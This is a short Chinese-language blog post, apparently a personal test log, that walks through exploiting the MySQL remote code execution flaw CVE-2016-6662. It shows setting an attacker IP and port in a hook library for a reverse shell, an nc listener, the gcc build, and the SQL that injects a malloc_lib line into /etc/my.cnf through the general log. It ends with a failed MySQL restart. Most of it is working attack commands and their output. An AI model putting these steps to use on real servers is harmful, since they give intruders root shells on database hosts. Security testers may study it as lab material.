首页 > 代码库 > CVE-2016-6662 mysql RCE测试

CVE-2016-6662 mysql RCE测试

参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法

1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:

#define ATTACKERS_IP "xx.x.x.x"#define SHELL_PORT 81

在攻击者机器上做好端口监听,等待反弹:

nc -lvv -p 81

  

2.编译库
gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl


3.执行命令:

mysql> set global general_log_file = ‘/etc/my.cnf‘;mysql> set global general_log = on;mysql> select ‘[mysqld]malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so[separator]‘;mysql> set global general_log = off;

  

4.可以发现my.cnf添加的内容

/usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:Tcp port: 3306 Unix socket: /tmp/mysql.sockTime Id Command Argument160914 17:45:16 1 Query select ‘[mysqld]malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so[separator]‘160914 17:45:22 1 Query set global general_log = off

  

5 然后重启mysql,mysql重启会报错

leo@ubuntu:~$ sudo /etc/init.d/mysql restart[....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details.failed!

 

CVE-2016-6662 mysql RCE测试